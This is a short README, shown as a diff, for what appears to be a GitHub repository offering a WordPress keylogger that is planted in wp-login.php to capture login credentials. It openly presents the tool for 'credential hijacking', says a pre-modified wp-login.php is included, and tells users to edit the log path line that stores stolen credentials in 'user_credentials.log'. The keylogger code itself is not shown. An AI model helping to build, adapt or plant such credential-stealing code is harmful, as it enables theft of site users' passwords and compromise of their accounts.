h4rry1337/Keylogger-Wordpress-Login/README.md

 Wordpress Keylogger for Credential Hijacking, Malicious code input into wp-login.php

 ## wp-login-KEYLOGGER-ALREADY-INSERTED.php
-is the file wp-login.php with the keylogger already inputted, but changes are required in the path for storing the logs $file_path = __DIR__. '/user_credentials.log';
+The file is wp-login-KEYLOGGER-ALREADY-INSERTED.php is wp-login.php with the keylogger already inserted, but changes to the path are required to store the logs, please change the following line: $file_path=DIR. '/user_credentials.log';